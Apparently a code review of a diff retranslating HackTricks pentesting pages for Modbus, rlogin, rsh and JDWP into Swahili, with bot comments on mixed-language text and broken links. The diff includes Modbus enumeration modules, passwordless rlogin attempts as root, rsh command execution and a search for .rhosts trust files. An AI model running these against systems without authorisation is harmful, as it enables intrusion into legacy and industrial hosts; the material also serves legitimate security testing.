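Review bot: the replacement text in this hunk is only a partial translation and in places reads worse than the lines it replaces. The paragraph after the jdwp-shellifier command block (`I found that the use of ... make the exploit more **stable**. And if you have the change to upload a backdoor ...`) is kept in English, with the upstream typos ("make" for "makes", "change" for "chance"), although the line it replaces was already in Swahili; the headings `## Exploiting`, `## More details` and `### **References:**` likewise revert to English. Two list items are half-translated: "zik representing hatua na matukio tofauti" in the JDWP Communication item and "Utekelezaji wa Msimbo wa K remote (RCE)" in the Real-Life Exploitation item (something like "zikiwakilisha hatua na matukio tofauti" and "Utekelezaji wa Msimbo wa Mbali (RCE)" would finish them). The first reference entry wraps the markdown link in an extra pair of square brackets (`* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](...)]`), which renders as literal brackets; drop the outer pair.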
@ -69,16 +72,17 @@ Nimegundua kuwa matumizi ya `--break-on 'java.lang.String.indexOf'` yanafanya sh
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
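Review bot: the rewritten footer in this hunk (`* Check the [**subscription plans**]...`, `* **Join the** 💬 [**Discord group**]...`, `* **Share hacking tricks by submitting PRs to the** ...`) is left in English, while the same template block is translated into Swahili in the Modbus, rlogin and rsh files of this commit ("Angalia [**mpango wa usajili**]...", "Shiriki mbinu za hacking kwa kuwasilisha PRs kwa"). Pick one language for the shared hint block across the translated pages: either translate these three lines too or revert the Swahili footers elsewhere. Separately, the older Swahili line being removed, `au **kikundi cha telegram**](https://t.me/peass)`, lacked its opening `[`, so this hunk also fixes a broken link; that is worth a mention in the commit message.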


@ -1,161 +1,45 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Mwaka 1979, **Itifaki ya Modbus** ilibuniwa na Modicon, ikitumika kama muundo wa ujumbe. Matumizi yake kuu ni kurahisisha mawasiliano kati ya vifaa vya akili, vikiendesha chini ya mfano wa bwana-mtumwa/mteja-seva. Itifaki hii inacheza jukumu muhimu katika kuruhusu vifaa kubadilishana data kwa ufanisi.
Mnamo mwaka wa 1979, **Modbus Protocol** ilitengenezwa na Modicon, ikihudumu kama muundo wa ujumbe. Matumizi yake makuu yanahusisha kuwezesha mawasiliano kati ya vifaa vyenye akili, vinavyofanya kazi chini ya mfano wa bwana-mtumwa/klienti-server. Protokali hii ina jukumu muhimu katika kuwezesha vifaa kubadilishana data kwa ufanisi.
**Bandari ya chaguo-msingi:** 502
**Default port:** 502
```
PORT STATE SERVICE
502/tcp open modbus
```
# Uchunguzi
## Modbus
Modbus ni itifaki ya mawasiliano ya viwandani ambayo hutumiwa sana katika mifumo ya kudhibiti na kusimamia vifaa vya viwandani. Itifaki hii inaruhusu vifaa vya kudhibiti kubadilishana habari na vifaa vingine kwa njia ya mtandao.
### Kugundua Huduma ya Modbus
Kabla ya kuanza kuchunguza huduma ya Modbus, tunahitaji kujua anwani ya IP ya kifaa tunachotaka kuchunguza. Kwa kufanya hivyo, tunaweza kutumia zana kama `nmap` au `netdiscover`.
Baada ya kupata anwani ya IP, tunaweza kutumia zana kama `modscan` au `modbus-cli` kugundua huduma ya Modbus na kuchunguza vifaa vilivyounganishwa.
### Kuchunguza Vifaa vya Modbus
Baada ya kugundua huduma ya Modbus, tunaweza kuanza kuchunguza vifaa vilivyounganishwa. Kuna njia kadhaa za kufanya hivyo:
1. **Kuchunguza Namba za Kitambulisho cha Kifaa (Unit ID)**: Kwa kutumia zana kama `modscan` au `modbus-cli`, tunaweza kuchunguza namba za kitambulisho cha kifaa na kujua ni vifaa gani vinavyopatikana kwenye mtandao.
2. **Kuchunguza Namba za Usajili (Register Addresses)**: Kwa kutumia zana kama `modscan` au `modbus-cli`, tunaweza kuchunguza namba za usajili na kujua habari gani inapatikana kwenye kila usajili.
3. **Kuchunguza Operesheni za Kusoma na Kuandika**: Kwa kutumia zana kama `modscan` au `modbus-cli`, tunaweza kuchunguza operesheni za kusoma na kuandika na kujua ni aina gani za habari tunaweza kupata au kubadilisha kwenye vifaa vya Modbus.
### Kuchunguza Udhaifu wa Modbus
Baada ya kuchunguza vifaa vya Modbus, tunaweza kuanza kutafuta udhaifu ambao tunaweza kuchexploit. Hapa kuna baadhi ya udhaifu maarufu wa Modbus:
1. **Udhaifu wa Usalama wa Kitambulisho cha Kifaa**: Baadhi ya vifaa vya Modbus hutumia namba za kitambulisho cha kifaa ambazo ni rahisi kutambulika. Hii inaweza kusababisha shambulio la kuchanganya habari au kubadilisha data kwenye vifaa vya Modbus.
2. **Udhaifu wa Usalama wa Usajili**: Baadhi ya vifaa vya Modbus hutumia namba za usajili ambazo hazijalindwa vizuri. Hii inaweza kusababisha shambulio la kubadilisha data au kusoma habari nyeti kutoka kwenye vifaa vya Modbus.
3. **Udhaifu wa Usalama wa Operesheni**: Baadhi ya vifaa vya Modbus hutumia operesheni za kusoma na kuandika ambazo hazijalindwa vizuri. Hii inaweza kusababisha shambulio la kubadilisha data au kusoma habari nyeti kutoka kwenye vifaa vya Modbus.
### Kuchunguza Huduma Zingine
Mbali na Modbus, kuna huduma zingine ambazo zinaweza kuwa zinatumika kwenye kifaa. Baadhi ya huduma hizi ni pamoja na:
- **HTTP**: Huduma ya wavuti inayotumiwa kwa kudhibiti na kusimamia kifaa.
- **SSH**: Huduma ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **Telnet**: Huduma ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **FTP**: Huduma ya uhamishaji wa faili ambayo inaruhusu uhamishaji wa faili kati ya kifaa na seva.
- **SNMP**: Huduma ya usimamizi wa mtandao ambayo inaruhusu ufuatiliaji na udhibiti wa vifaa vya mtandao.
- **SMTP**: Huduma ya barua pepe ambayo inaruhusu kutuma na kupokea barua pepe.
- **DNS**: Huduma ya jina la kikoa ambayo inaruhusu kutafsiri majina ya kikoa kuwa anwani za IP.
- **NTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **SNTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **RDP**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **VNC**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **SMB**: Huduma ya kushirikiana faili ambayo inaruhusu kushiriki faili kati ya vifaa vya mtandao.
- **RPC**: Huduma ya itifaki ya mbali ambayo inaruhusu kufanya wito wa mbali kwenye kifaa.
- **ICMP**: Huduma ya itifaki ya udhibiti wa ujumbe ambayo inaruhusu ujumbe wa udhibiti na taarifa kati ya vifaa vya mtandao.
- **ARP**: Huduma ya itifaki ya azimio la anwani ambayo inaruhusu kutafuta anwani za MAC kwa anwani za IP.
- **DHCP**: Huduma ya itifaki ya usambazaji wa anwani ya IP ambayo inaruhusu kugawa anwani za IP kwa vifaa vya mtandao.
- **DNS**: Huduma ya itifaki ya jina la kikoa ambayo inaruhusu kutafsiri majina ya kikoa kuwa anwani za IP.
- **LDAP**: Huduma ya itifaki ya miongozo ya upatikanaji wa saraka ambayo inaruhusu upatikanaji wa habari ya saraka kwenye mtandao.
- **RADIUS**: Huduma ya itifaki ya udhibiti wa ufikiaji wa mtandao ambayo inaruhusu udhibiti wa ufikiaji kwenye mtandao.
- **TFTP**: Huduma ya itifaki ya uhamishaji wa faili ndogo ambayo inaruhusu uhamishaji wa faili ndogo kati ya kifaa na seva.
- **SNMP**: Huduma ya itifaki ya usimamizi wa mtandao ambayo inaruhusu ufuatiliaji na udhibiti wa vifaa vya mtandao.
- **SMTP**: Huduma ya itifaki ya barua pepe ambayo inaruhusu kutuma na kupokea barua pepe.
- **POP3**: Huduma ya itifaki ya barua pepe ambayo inaruhusu kupokea barua pepe.
- **IMAP**: Huduma ya itifaki ya barua pepe ambayo inaruhusu kupokea na kusimamia barua pepe.
- **FTP**: Huduma ya itifaki ya uhamishaji wa faili ambayo inaruhusu uhamishaji wa faili kati ya kifaa na seva.
- **SSH**: Huduma ya itifaki ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **Telnet**: Huduma ya itifaki ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **HTTP**: Huduma ya itifaki ya wavuti ambayo inaruhusu kudhibiti na kusimamia kifaa.
- **HTTPS**: Huduma ya itifaki ya wavuti salama ambayo inaruhusu kudhibiti na kusimamia kifaa kwa njia salama.
- **DNS**: Huduma ya itifaki ya jina la kikoa ambayo inaruhusu kutafsiri majina ya kikoa kuwa anwani za IP.
- **NTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **SNTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **RDP**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **VNC**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **SMB**: Huduma ya itifaki ya kushirikiana faili ambayo inaruhusu kushiriki faili kati ya vifaa vya mtandao.
- **RPC**: Huduma ya itifaki ya mbali ambayo inaruhusu kufanya wito wa mbali kwenye kifaa.
- **ICMP**: Huduma ya itifaki ya udhibiti wa ujumbe ambayo inaruhusu ujumbe wa udhibiti na taarifa kati ya vifaa vya mtandao.
- **ARP**: Huduma ya itifaki ya azimio la anwani ambayo inaruhusu kutafuta anwani za MAC kwa anwani za IP.
- **DHCP**: Huduma ya itifaki ya usambazaji wa anwani ya IP ambayo inaruhusu kugawa anwani za IP kwa vifaa vya mtandao.
- **LDAP**: Huduma ya itifaki ya miongozo ya upatikanaji wa saraka ambayo inaruhusu upatikanaji wa habari ya saraka kwenye mtandao.
- **RADIUS**: Huduma ya itifaki ya udhibiti wa ufikiaji wa mtandao ambayo inaruhusu udhibiti wa ufikiaji kwenye mtandao.
- **TFTP**: Huduma ya itifaki ya uhamishaji wa faili ndogo ambayo inaruhusu uhamishaji wa faili ndogo kati ya kifaa na seva.
# Uhesabuzi
```bash
nmap --script modbus-discover -p 502 <IP>
msf> use auxiliary/scanner/scada/modbusdetect
msf> use auxiliary/scanner/scada/modbus_findunitid
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
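Review bot: removing the "# Uchunguzi" section is the right call, since it is generic text absent from the English page and its service list repeats entries (DNS, SNMP, SMTP, FTP, SSH, HTTP and others each appear two or three times), but the surviving file is now inconsistent in language: the heading `# Basic Information` and the label `**Default port:** 502` revert to English while `# Uhesabuzi` stays Swahili, and the top hint block reads "Learn & practice AWS Hacking" while the bottom one reads "Jifunze na fanya mazoezi ya AWS Hacking". Suggest keeping the previous "# Taarifa Msingi" and "**Bandari ya chaguo-msingi:** 502" for the heading and label, and using the same wording for both hint blocks of the file.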


@ -1,29 +1,30 @@
# 513 - Kupima Usalama wa Rlogin
# 513 - Pentesting Rlogin
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Taarifa Msingi
## Basic Information
Awali, **rlogin** ilikuwa ikitumiwa sana kwa kazi za utawala wa mbali. Hata hivyo, kutokana na wasiwasi kuhusu usalama wake, kwa kiasi kikubwa imepita na **slogin** na **ssh**. Mbinu hizi mpya hutoa usalama bora kwa mawasiliano ya mbali.
Katika siku za nyuma, **rlogin** ilitumika sana kwa kazi za usimamizi wa mbali. Hata hivyo, kutokana na wasiwasi kuhusu usalama wake, imekuwa ikifutwa kwa kiasi kikubwa na **slogin** na **ssh**. Njia hizi mpya zinatoa usalama ulioimarishwa kwa ajili ya muunganisho wa mbali.
**Bandari ya chaguo:** 513
**Default port:** 513
```
PORT STATE SERVICE
513/tcp open login
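Review bot: this hunk reverts previously translated headings and labels to English while retranslating the body: the title becomes `# 513 - Pentesting Rlogin`, the section heading `## Basic Information`, and the port label `**Default port:** 513`, yet the paragraph between them is Swahili. The earlier forms ("# 513 - Kupima Usalama wa Rlogin", "## Taarifa Msingi", "**Bandari ya chaguo:** 513") should be kept, or the mixed-language result stated as intentional in the commit message. The top hint block of this file also stays English ("Learn & practice AWS Hacking") while the footer of the same file in the last hunk is translated, so the two blocks need aligning.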
@ -33,11 +34,11 @@ PORT STATE SERVICE
# Install client
apt-get install rsh-client
```
Unaweza kutumia amri ifuatayo kujaribu **kuingia** kwenye mwenyeji wa mbali ambapo **haihitajiki nenosiri** kwa ufikiaji. Jaribu kutumia **root** kama jina la mtumiaji:
Unaweza kutumia amri ifuatayo kujaribu **kuingia** kwenye mwenyeji wa mbali ambapo **hakuna nenosiri** linalohitajika kwa ufikiaji. Jaribu kutumia **root** kama jina la mtumiaji:
```bash
rlogin <IP> -l <username>
```
### [Kuvunja nguvu](../generic-methodologies-and-resources/brute-force.md#rlogin)
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rlogin)
## Pata faili
```
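Review bot: the heading `### [Brute force](../generic-methodologies-and-resources/brute-force.md#rlogin)` replaces the Swahili "### [Kuvunja nguvu](...)" while the next heading, `## Pata faili`, stays in Swahili, so adjacent headings now mix languages. Either keep "Kuvunja nguvu" or translate "Pata faili" as well; the link target is unchanged either way. The reworded sentence above the `rlogin <IP> -l <username>` block is fine and needs no further change.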
@ -48,16 +49,17 @@ find / -name .rhosts
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
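Review bot: the footer of this file is translated ("Jifunze na fanya mazoezi ya AWS Hacking", "Angalia [**mpango wa usajili**]", "Shiriki mbinu za udukuzi") while the header hint block of the same file, in its first hunk, stays English ("Learn & practice AWS Hacking", "Check the [**subscription plans**]"). Use one version for both blocks. Also, "mbinu za udukuzi" here and "mbinu za hacking" in the Modbus file's footer translate the same template line differently; choose one rendering of "hacking tricks" for the whole commit.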


@ -1,28 +1,29 @@
# 514 - Pentesting Rsh
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kwa ajili ya uwakiki, faili za **.rhosts** pamoja na **/etc/hosts.equiv** zilitumiwa na **Rsh**. Uwakiki ulitegemea anwani za IP na Mfumo wa Jina la Kikoa (DNS). Urahisi wa kudanganya anwani za IP, hasa kwenye mtandao wa ndani, ulikuwa ni udhaifu mkubwa.
Kwa ajili ya uthibitishaji, **.rhosts** faili pamoja na **/etc/hosts.equiv** zilitumika na **Rsh**. Uthibitishaji ulikuwa unategemea anwani za IP na Mfumo wa Majina ya Kikoa (DNS). Urahisi wa kudanganya anwani za IP, hasa kwenye mtandao wa ndani, ulikuwa udhaifu mkubwa.
Zaidi ya hayo, ilikuwa kawaida faili za **.rhosts** kuwekwa ndani ya saraka za nyumbani za watumiaji, ambazo mara nyingi zilikuwa zimehifadhiwa kwenye sehemu za Network File System (NFS).
Zaidi ya hayo, ilikuwa kawaida kwa **.rhosts** faili kuwekwa ndani ya saraka za nyumbani za watumiaji, ambazo mara nyingi zilikuwa ziko kwenye volumu za Mfumo wa Faili wa Mtandao (NFS).
**Bandari ya chaguo-msingi**: 514
**Port ya kawaida**: 514
## Ingia
## Login
```
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
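Review bot: the port label in this hunk, `**Port ya kawaida**: 514`, mixes English and Swahili and matches neither the previous "**Bandari ya chaguo-msingi**: 514" nor the `**Default port:** 513` used in the rlogin file of this same commit; settle on one label. The heading `## Login` also reverts to English while the paragraphs above it are Swahili. In the retranslated paragraphs, "**.rhosts** faili" places the noun after its modifier; the previous "faili za **.rhosts**" is the natural Swahili order and should be kept.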
@ -31,19 +32,20 @@ rsh domain\\user@<IP> <Command>
```
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsh)
## Marejeo
## References
* [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
